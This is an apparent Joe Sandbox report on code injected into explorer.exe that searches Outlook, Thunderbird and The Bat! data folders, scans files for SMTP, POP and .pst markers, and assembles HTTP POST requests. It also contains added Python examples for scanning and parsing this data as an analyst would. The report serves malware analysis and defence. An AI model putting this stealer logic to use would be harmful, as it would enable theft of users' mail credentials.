                                                      • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Thunderbird,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 000810D3
                                                      • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\The Bat!,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 000810E7
                                                      • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\The Bat!,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 000810FB
                                                      • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\BatMail,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 0008110F
                                                      • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\BatMail,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 00081123
                                                      • wsprintfA.USER32 ref: 0008116B
                                                      • ExitProcess.KERNEL32 ref: 00081189
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.421457935.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentExpandStrings$HeapProcess$AllocateExitFolderPathSpecialwsprintf
                                                      • String ID: %ALLUSERSPROFILE%\BatMail$%ALLUSERSPROFILE%\Microsoft\Outlook$%ALLUSERSPROFILE%\The Bat!$%APPDATA%\BatMail$%APPDATA%\Microsoft\Outlook$%APPDATA%\The Bat!$%APPDATA%\Thunderbird$%LOCALAPPDATA%\Microsoft\Outlook$%s,
                                                      • API String ID: 1709485025-1688604020
                                                      • Opcode ID: 72968f9d89e6bc32a17a9400d13fd263b6a4988c16ccb6dcd1446170f9e16262
                                                      • Instruction ID: 4a2ba61a2a61d2de802517fd4c21c0c34be2e32a5e302aa0719222a3359143be
                                                      • Opcode Fuzzy Hash: 72968f9d89e6bc32a17a9400d13fd263b6a4988c16ccb6dcd1446170f9e16262
                                                      • Instruction Fuzzy Hash: 7331937174022566EA5133654C1AFFF198DBF81FD4B050124F6C9DA2C3DE598E0387B6

                                                      Control-flow Graph

                                                      APIs
                                                      • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00081289
                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 000812A1
                                                      • CloseHandle.KERNELBASE(00000000), ref: 000816F4
                                                        • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                        • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                      • ReadFile.KERNELBASE(00000000,00000000,00000400,?,00000000), ref: 000812E8
                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0008132D
                                                      • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 00081379
                                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 000813B6
                                                        • Part of subcall function 00081C39: RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081C55
                                                        • Part of subcall function 00081972: RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081994
                                                      • Sleep.KERNELBASE(00000064), ref: 000816FD
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.421457935.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: File$MemoryMove$HeapRead$AllocateCloseCreateHandlePointerProcessSizeSleep
                                                      • String ID:
                                                      • API String ID: 1032042679-0
                                                      • Opcode ID: 61bc2f22d2100cfa5cada242e575fdd2c09bc464b337c3e81574e5df978ef6ef
                                                      • Instruction ID: 75e5417636b9bb59cc4e60b4fe32e97da451ac298a5a535e8d66e3deab824b36
                                                      • Opcode Fuzzy Hash: 61bc2f22d2100cfa5cada242e575fdd2c09bc464b337c3e81574e5df978ef6ef
                                                      • Instruction Fuzzy Hash: 9DD1D2746082119BC764BF2888406FABBEABFC8760F48462DF8D597295E7308D53CB95

                                                      Control-flow Graph

                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00082758
                                                      • Process32First.KERNEL32(00000000,?), ref: 00082777
                                                      • lstrcmpi.KERNEL32(?,outlook.exe), ref: 0008278B
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 000827A8
                                                      • CloseHandle.KERNELBASE(00000000), ref: 000827B3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.421457935.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
                                                      • String ID: outlook.exe
                                                      • API String ID: 868014591-749849299
                                                      • Opcode ID: 5a2c25bce87a4886a15f15d2e2ef7a80a439fc0a196e4a8c78eb7e8f423e4933
                                                      • Instruction ID: 343884579346d2584715dea729d65f949d7c5dc94cdf17a98ebe8d79567dd670
                                                      • Opcode Fuzzy Hash: 5a2c25bce87a4886a15f15d2e2ef7a80a439fc0a196e4a8c78eb7e8f423e4933
                                                      • Instruction Fuzzy Hash: 23F06230505128ABE720BB65DC49BEE77BCBB48B25F400190E9C9A2191EB388B544F95

Control-flow Graph

control_flow_graph 0x89cf6-0x89f3d (node layout not recoverable in text): a long run of short blocks, several of them tight self-loops (0x89d44, 0x89e25, 0x89e34, 0x89f34), with no imported calls except VirtualProtect, called twice at 0x89f00-0x89f30; the APIs list for this function is otherwise empty.
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.421457935.0000000000088000.00000040.80000000.00040000.00000000.sdmp, Offset: 00088000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_88000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0108dd120b053b6f55e8645ecb237e8214c936467551cc72fb4cdbd494caad90
                                                      • Instruction ID: a463335449e91c4295caeb03356daa0005c9d69c2ec95bec009e1af8dcd402f7
                                                      • Opcode Fuzzy Hash: 0108dd120b053b6f55e8645ecb237e8214c936467551cc72fb4cdbd494caad90
                                                      • Instruction Fuzzy Hash: 439137725193914FD726BE78CCC46B5BFE0FB52320B2C06A9D9D1CB386E7A4580AC764

Control-flow Graph

control_flow_graph 0x829b7-0x829c7, a single block: GetProcessHeap followed by RtlAllocateHeap. This is the allocation helper that other functions in this dump reach as "Part of subcall function 000829B7".
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.421457935.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocateProcess
                                                      • String ID:
                                                      • API String ID: 1357844191-0
                                                      • Opcode ID: b9351f4542ec540c723d8288ffa8f1c93b00f39b480ad427a02778a4ffa0a27d
                                                      • Instruction ID: 3c8c13ecdc887a9dfa87a418431857bd093085331a36a112817de6aaaa3d87e4
                                                      • Opcode Fuzzy Hash: b9351f4542ec540c723d8288ffa8f1c93b00f39b480ad427a02778a4ffa0a27d
                                                      • Instruction Fuzzy Hash: 1CA002B15503005BFD4457F5AE1EA157528B7D4B01F0045447385890549A6955148F21

Control-flow Graph

control_flow_graph 0x82999-0x829b6: calls 0x827e2 (which does VirtualQuery), then either returns (0x829b5) or runs GetProcessHeap/HeapFree (0x829a5-0x829af); the release helper paired with the allocator at 0x829b7.
                                                      APIs
                                                        • Part of subcall function 000827E2: VirtualQuery.KERNEL32(00000000,00000209,0000001C,00000209,00082664,?,000818F4), ref: 000827EF
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00000209,00082664,?,000818F4), ref: 000829A8
                                                      • HeapFree.KERNEL32(00000000,?,000818F4), ref: 000829AF
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.421457935.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Heap$FreeProcessQueryVirtual
                                                      • String ID:
                                                      • API String ID: 2580854192-0
                                                      • Opcode ID: df64934d43702fa617687989b5c70bf43bb8b9b35f146b4e005b86ab177719a1
                                                      • Instruction ID: 09411c8b402897cefff5f73e0440f262c5ce0b05ffcf0dbc953be38e067b1978
                                                      • Opcode Fuzzy Hash: df64934d43702fa617687989b5c70bf43bb8b9b35f146b4e005b86ab177719a1
                                                      • Instruction Fuzzy Hash: ACC02B3100433053DA6037743C1DBC63B0CBF8AB21F050082F9C1970418B6A8C018BB0

Control-flow Graph

control_flow_graph 0x81c39-0x81e3c (node layout not recoverable in text): allocates through 0x829b7 and copies with RtlMoveMemory from (source - 0x40); a scanning loop (0x81c65-0x81d99, repeatedly calling 0x81ffb) selects candidate regions; for each candidate it allocates again, makes a NUL-terminated copy with RtlMoveMemory/RtlZeroMemory (0x81da8-0x81dd3), then runs StrStrIA for "from", "Blob", "Pop", "SMTP" and ".pst" in that order (0x81de5-0x81e15); only a candidate that passes all five checks reaches 0x81e1b and the call to 0x81e44, and every path releases the copy through 0x82999 (0x81e22).
                                                      APIs
                                                        • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                        • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                      • RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081C55
                                                      • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00081DBA
                                                      • RtlZeroMemory.NTDLL(?,?), ref: 00081DD3
                                                      • StrStrIA.SHLWAPI(00000000,from), ref: 00081DE5
                                                      • StrStrIA.SHLWAPI(00000000,Blob), ref: 00081DF1
                                                      • StrStrIA.SHLWAPI(00000000,Pop), ref: 00081DFD
                                                      • StrStrIA.SHLWAPI(00000000,SMTP), ref: 00081E09
                                                      • StrStrIA.SHLWAPI(00000000,.pst), ref: 00081E15
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.421457935.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Memory$HeapMove$AllocateProcessZero
                                                      • String ID: -$-$.$.$.pst$/$/$:$:$Blob$Pop$SMTP$_$_$from
                                                      • API String ID: 1061763166-3069160855
                                                      • Opcode ID: b84919368493d7d5f368d1f8ce8e5c1d9a6d62c27fbc89321324b14f0ac629bc
                                                      • Instruction ID: 4b5aa8aed124a3871e58e12401931c93ac944f0da3ca0bc3fe3e93e69f00f3b1
                                                      • Opcode Fuzzy Hash: b84919368493d7d5f368d1f8ce8e5c1d9a6d62c27fbc89321324b14f0ac629bc
                                                      • Instruction Fuzzy Hash: BC5156B0B407165BEB64BA1888A46FE77DEBF85700F084919FDC44B283DB798C474792

Control-flow Graph

control_flow_graph 0x81972-0x81c31 (node layout not recoverable in text): the wide-character counterpart of 0x81c39: the same allocate-and-copy from (source - 0x40) (RtlMoveMemory at 0x81994), the same candidate-selection loop via 0x81ffb, then RtlMoveMemory/RtlZeroMemory (0x81b53-0x81b61) and StrStrIW for "from", "Blob", "Pop", "SMTP" and ".pst" (0x81b99-0x81bc9); a candidate that passes all five reaches lstrlenW (0x81bd0) and a block at 0x81bda that calls 0x829b7, 0x82917, 0x81e44 and 0x82999 in turn.
                                                      APIs
                                                        • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                        • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                      • RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081994
                                                      • RtlMoveMemory.NTDLL(00000000,00000000,00000001), ref: 00081B53
                                                      • RtlZeroMemory.NTDLL(00000000,00000001), ref: 00081B61
                                                      • StrStrIW.SHLWAPI(00000000,from), ref: 00081B99
                                                      • StrStrIW.SHLWAPI(00000000,Blob), ref: 00081BA5
                                                      • StrStrIW.SHLWAPI(00000000,Pop), ref: 00081BB1
                                                      • StrStrIW.SHLWAPI(00000000,SMTP), ref: 00081BBD
                                                      • StrStrIW.SHLWAPI(00000000,.pst), ref: 00081BC9
                                                      • lstrlenW.KERNEL32(00000000), ref: 00081BD0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.421457935.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Memory$HeapMove$AllocateProcessZerolstrlen
                                                      • String ID: .pst$;$<$Blob$Pop$SMTP$from
                                                      • API String ID: 76385412-3831209991
                                                      • Opcode ID: daa115a76ccc5235f2113b9ee301909c6d2d8d6482403054c7f97d7641e7743b
                                                      • Instruction ID: 4513c980414ea6726187ff74bc215935d9f5c7d3fe74b3bdc2598ba981a98ec9
                                                      • Opcode Fuzzy Hash: daa115a76ccc5235f2113b9ee301909c6d2d8d6482403054c7f97d7641e7743b
                                                      • Instruction Fuzzy Hash: 7B71D2357443129BDB28BF18DD40AEE77E9BF88750F148829E9C19B282DB70DD878791
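
The two functions above (0x81c39 with StrStrIA and 0x81972 with StrStrIW) apply the same five case-insensitive markers, from, Blob, Pop, SMTP and .pst, to data that the function at 0x8190c reads with CreateFileW/GetFileSize/ReadFile, copying from 0x40 bytes before each candidate (RtlMoveMemory(..., -00000040, ...)). The following Python is an added example, not code from the report or from the sample: it reproduces that marker scan offline over a constructed byte blob holding both ANSI and UTF-16LE strings, so an analyst can see what such a scan would surface in a real mail-profile file. The graph text does not show which StrStrI result continues the chain, so the example reports every hit and separately answers whether all five markers are present; the 0x40-byte context window and the sample data are assumptions.

```python
"""Added example: reproduce the five-marker StrStrIA/StrStrIW scan seen in the
dumped explorer.exe code (0x81c39 / 0x81972) over an in-memory byte blob.
Not code from the sample or the report; SAMPLE below is constructed."""
import re
from dataclasses import dataclass
from typing import List, Set

# String IDs recovered from the dump; StrStrI* is case-insensitive, so we match that way.
MARKERS = ("from", "Blob", "Pop", "SMTP", ".pst")
# The dumped code copies from (hit - 0x40); treating that as leading context is an assumption.
CONTEXT = 0x40


@dataclass(frozen=True)
class Hit:
    offset: int      # byte offset of the marker in the scanned data
    encoding: str    # "ansi" (StrStrIA path) or "wide" (StrStrIW path)
    marker: str
    context: bytes   # up to CONTEXT bytes before the marker, plus the marker itself


def _patterns():
    """One case-insensitive regex per marker and encoding.
    For UTF-16LE the interleaved NUL bytes are part of the pattern, so an ANSI
    pattern never matches wide text and vice versa (mirrors the A/W split)."""
    pats = []
    for m in MARKERS:
        pats.append(("ansi", m, re.compile(re.escape(m.encode("ascii")), re.IGNORECASE)))
        pats.append(("wide", m, re.compile(re.escape(m.encode("utf-16-le")), re.IGNORECASE)))
    return pats


def scan(data: bytes) -> List[Hit]:
    """Return every marker occurrence in both encodings, ordered by offset."""
    hits = []
    for enc, marker, pat in _patterns():
        for m in pat.finditer(data):
            start = max(0, m.start() - CONTEXT)
            hits.append(Hit(m.start(), enc, marker, data[start:m.end()]))
    hits.sort(key=lambda h: (h.offset, h.encoding))
    return hits


def markers_present(data: bytes, encoding: str) -> Set[str]:
    """Which of the five markers occur in the given encoding."""
    return {h.marker for h in scan(data) if h.encoding == encoding}


def all_markers_present(data: bytes, encoding: str) -> bool:
    """True if a chain of five StrStrI checks would find every marker."""
    return markers_present(data, encoding) == set(MARKERS)


# Constructed stand-in for a file holding mail-account settings: ANSI values first,
# then UTF-16LE values, with mixed case to show the case-insensitive matching.
SAMPLE = (
    b"\x00" * 16
    + b"SMTP Server\x00mail.example.invalid\x00"
    + b"POP3 Password\x00\x80\x01\x02blob\x00"
    + "Email\0alice@example.invalid\0".encode("utf-16-le")
    + "Store\0C:\\Users\\alice\\Outlook.pst\0".encode("utf-16-le")
    + b"From: Alice\r\n"
)

if __name__ == "__main__":
    for h in scan(SAMPLE):
        print(f"{h.offset:#06x} {h.encoding:4s} {h.marker:5s} {h.context[-24:]!r}")
    print("ansi markers:", sorted(markers_present(SAMPLE, "ansi")))
    print("wide markers:", sorted(markers_present(SAMPLE, "wide")))
```

Run it against a real file with `scan(open(path, "rb").read())`; the ANSI and wide hit sets stay separate because the dumped code keeps separate A and W scan routines.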

Control-flow Graph

control_flow_graph 0x820a7-0x82412 (node layout not recoverable in text): calls 0x82415, 0x829b7, 0x82938 (lstrlen + MultiByteToWideChar) and 0x824cc (RtlZeroMemory) on entry; RtlZeroMemory of a 0x3C-byte block at 0x82135; two allocate-then-wsprintfW steps at 0x8225e-0x8228c and 0x822be-0x822f4 (the request-building steps whose format strings appear under String ID below); a copy loop ending in RtlMoveMemory at 0x823a0; every path frees through 0x82999 before returning at 0x82403.
                                                      APIs
                                                        • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                        • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                        • Part of subcall function 00082938: lstrlen.KERNEL32(0041AE26,?,00000000,00000000,000820E3,75712B62,0041AE26,00000000), ref: 00082940
                                                        • Part of subcall function 00082938: MultiByteToWideChar.KERNEL32(00000000,00000000,0041AE26,00000001,00000000,00000000), ref: 00082952
                                                        • Part of subcall function 000824CC: RtlZeroMemory.NTDLL(?,00000018), ref: 000824DE
                                                      • RtlZeroMemory.NTDLL(?,0000003C), ref: 0008213F
                                                      • wsprintfW.USER32 ref: 00082278
                                                      • wsprintfW.USER32 ref: 000822E3
                                                      • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 000823AD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.421457935.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                      • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                      • API String ID: 4204651544-1701262698
                                                      • Opcode ID: 2d0a82c8d0d7e4589e8405ce0e55f6720ae0ccaaaabdf10beb67123a4c5655e5
                                                      • Instruction ID: a01ef7159da9355fa114d69cd7f2b2a9dec58d7afaa36dde2eb3a980ae35fe43
                                                      • Opcode Fuzzy Hash: 2d0a82c8d0d7e4589e8405ce0e55f6720ae0ccaaaabdf10beb67123a4c5655e5
                                                      • Instruction Fuzzy Hash: 2DA16AB1608340AFE750EF68D894A6BBBE8FF88750F10092DF9C5D7252DA34DE058B52

Control-flow Graph

control_flow_graph 0x81ece-0x81fb3 (node layout not recoverable in text): StrStrIA at 0x81ee4 against the string at 0x831d8; on a hit, two RtlMoveMemory copies (0x81f08, 0x81f22) and three further StrStrIA calls (0x81f31, 0x81f44, 0x81f57), then lstrlen (0x81f64) and a loop that calls 0x81ffb and lstrlen (0x81f9d) until a chain of comparisons at 0x81f7a-0x81f99 ends it.
                                                      APIs
                                                      • StrStrIA.SHLWAPI(00000000,000831D8), ref: 00081EE4
                                                      • RtlMoveMemory.NTDLL(?,00000000,00000000), ref: 00081F08
                                                      • RtlMoveMemory.NTDLL(?,?), ref: 00081F22
                                                      • StrStrIA.SHLWAPI(00000000,?), ref: 00081F31
                                                      • StrStrIA.SHLWAPI(00000000,?), ref: 00081F44
                                                      • StrStrIA.SHLWAPI(?,?), ref: 00081F57
                                                      • lstrlen.KERNEL32(00000000), ref: 00081F64
                                                      • lstrlen.KERNEL32(00000000), ref: 00081F9D
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.421457935.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: MemoryMovelstrlen
                                                      • String ID:
                                                      • API String ID: 456560858-0
                                                      • Opcode ID: 7a14b61d49639bded18d49fe900f4b0fc9897078ed695063aad06e24d9f1e285
                                                      • Instruction ID: 6da4ad79282a5736bd751d79d8e3ad9208539ada28f005c9117f4ca21c0103b0
                                                      • Opcode Fuzzy Hash: 7a14b61d49639bded18d49fe900f4b0fc9897078ed695063aad06e24d9f1e285
                                                      • Instruction Fuzzy Hash: 702190725043196ADB30BA649C85FEB7BDCAF85744F000936EBC4C3113E729D94B87A2
                                                      APIs
                                                      • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,75A7D250,?,?,00081E22), ref: 00081E5D
                                                      • CharLowerBuffA.USER32(00000000,00000000), ref: 00081E69
                                                      • lstrcmpi.KERNEL32(00000000,0041C16C), ref: 00081E81
                                                      • lstrlen.KERNEL32(00000000,?,00081E22), ref: 00082699
                                                      • RtlMoveMemory.NTDLL(0041C16C,00000000,00000000), ref: 000826A2
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.421457935.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$BuffCharLowerMemoryMovelstrcmpi
                                                      • String ID:
                                                      • API String ID: 2826435453-0
                                                      • Opcode ID: ef267b4f75cccad907b9530f99bc2299fdce0451e31b5f1636dbc808011e4daf
                                                      • Instruction ID: 01f6e81a6ba3fb045b30a4bd0ba53f7463dec2894d89fef1a73f4158b8aeafa4
                                                      • Opcode Fuzzy Hash: ef267b4f75cccad907b9530f99bc2299fdce0451e31b5f1636dbc808011e4daf
                                                      • Instruction Fuzzy Hash: 3221C6B66002105FE710AF24EC849FA77DDFFC9725B10052AEC85C7251D776990687A2
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0008190C
                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0008191C
                                                      • CloseHandle.KERNEL32(00000000), ref: 00081966
                                                        • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                        • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00081941
                                                        • Part of subcall function 00081C39: RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081C55
                                                        • Part of subcall function 00081972: RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081994
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.421457935.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: File$HeapMemoryMove$AllocateCloseCreateHandleProcessReadSize
                                                      • String ID:
                                                      • API String ID: 3402831612-0
                                                      • Opcode ID: 2be5267b56057d24c1f5efdeeaf95091aebe7c739d2765d28efaa2af9e852935
                                                      • Instruction ID: 92500d04bea994f5137bb789ba7b1fdb9588a09fa389c957eef6f3e76e100f7c
                                                      • Opcode Fuzzy Hash: 2be5267b56057d24c1f5efdeeaf95091aebe7c739d2765d28efaa2af9e852935
                                                      • Instruction Fuzzy Hash: EF01D6323002147BE2213A35DC68EEF7A9DFF86BB4F010629F5D6A21D1DA259D069770
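
Each function entry above lists its direct API calls, the calls inside helpers it reaches ("Part of subcall function ..."), and a "$"-separated String ID. The following Python is an added example, not part of Joe Sandbox or of this report: it parses entries in that layout into records and tags the behaviours visible in this explorer.exe dump (Toolhelp32 process enumeration with an lstrcmpi against a process name, the mail-marker StrStrI scan, and the wsprintfW HTTP POST builder), using three entries copied from the page as input. The record layout, the tag names and the tagging rules are the example's own choices.

```python
"""Added example: parse Joe Sandbox 'APIs' / 'String ID' entries (the layout used
in this report) into records and tag the behaviours seen in this explorer.exe dump.
Not part of Joe Sandbox or of the report; tag names and rules are this example's own."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# "<api>.<module>(<args>), ref: <addr>" with optional "Part of subcall function <addr>: " prefix;
# the wsprintfW entries on the page carry no argument list, so the parenthesised part is optional.
API_LINE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)
STRING_LINE = re.compile(r"^String ID:\s*(?P<strings>.*)$")   # '$'-separated list
MAIL_MARKERS = {"from", "Blob", "Pop", "SMTP", ".pst"}


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: Tuple[str, ...]
    ref: int                      # call-site address
    parent: Optional[int] = None  # helper that really contains the call, for subcall entries


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)

    def direct_apis(self):
        """Names of calls made by the function itself, not by helpers it reaches."""
        return {a.name for a in self.apis if a.parent is None}


def parse_block(text: str) -> FunctionRecord:
    """Parse one function's APIs/String ID section; lines of other kinds are ignored."""
    rec = FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        m = API_LINE.match(line)
        if m:
            args = tuple(a for a in (m["args"] or "").split(",") if a)
            parent = int(m["parent"], 16) if m["parent"] else None
            rec.apis.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16), parent))
            continue
        m = STRING_LINE.match(line)
        if m:
            rec.strings = [s for s in m["strings"].split("$") if s]
    return rec


def classify(rec: FunctionRecord) -> List[str]:
    """Behaviour tags derived from direct API calls plus recovered strings."""
    apis, strs = rec.direct_apis(), set(rec.strings)
    tags = []
    if {"CreateToolhelp32Snapshot", "Process32First", "Process32Next", "lstrcmpi"} <= apis:
        targets = sorted(s for s in strs if s.lower().endswith(".exe"))
        tags.append("process-discovery-by-name:" + ",".join(targets))
    if apis & {"StrStrIA", "StrStrIW"} and MAIL_MARKERS <= strs:
        tags.append("mail-artifact-scan")
    if "wsprintfW" in apis and "POST" in strs and any(s.startswith("Host:") for s in strs):
        tags.append("http-post-builder")
    if {"CreateFileW", "ReadFile"} <= apis:
        tags.append("file-read-to-memory")
    return tags


# Three entries copied from the report above (input data taken from the page, not constructed).
OUTLOOK_BLOCK = """
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00082758
• Process32First.KERNEL32(00000000,?), ref: 00082777
• lstrcmpi.KERNEL32(?,outlook.exe), ref: 0008278B
• Process32Next.KERNEL32(00000000,00000128), ref: 000827A8
• CloseHandle.KERNELBASE(00000000), ref: 000827B3
• String ID: outlook.exe
"""
MAIL_BLOCK = """
• StrStrIA.SHLWAPI(00000000,from), ref: 00081DE5
• StrStrIA.SHLWAPI(00000000,Blob), ref: 00081DF1
• StrStrIA.SHLWAPI(00000000,Pop), ref: 00081DFD
• StrStrIA.SHLWAPI(00000000,SMTP), ref: 00081E09
• StrStrIA.SHLWAPI(00000000,.pst), ref: 00081E15
• String ID: -$-$.$.$.pst$/$/$:$:$Blob$Pop$SMTP$_$_$from
"""
POST_BLOCK = """
  • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
  • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
• RtlZeroMemory.NTDLL(?,0000003C), ref: 0008213F
• wsprintfW.USER32 ref: 00082278
• wsprintfW.USER32 ref: 000822E3
• RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 000823AD
• String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
"""

if __name__ == "__main__":
    for name, block in (("outlook", OUTLOOK_BLOCK), ("mail", MAIL_BLOCK), ("post", POST_BLOCK)):
        rec = parse_block(block)
        print(name, len(rec.apis), "calls", classify(rec))
```

Subcall entries are kept but excluded from tagging, so a function is not labelled an allocator merely because it reaches the 0x829b7 helper; the rules can be extended with further API sets as more of the dump is read.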

                                                      Execution Graph

                                                      Execution Coverage:6.6%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:223
                                                      Total number of Limit Nodes:16
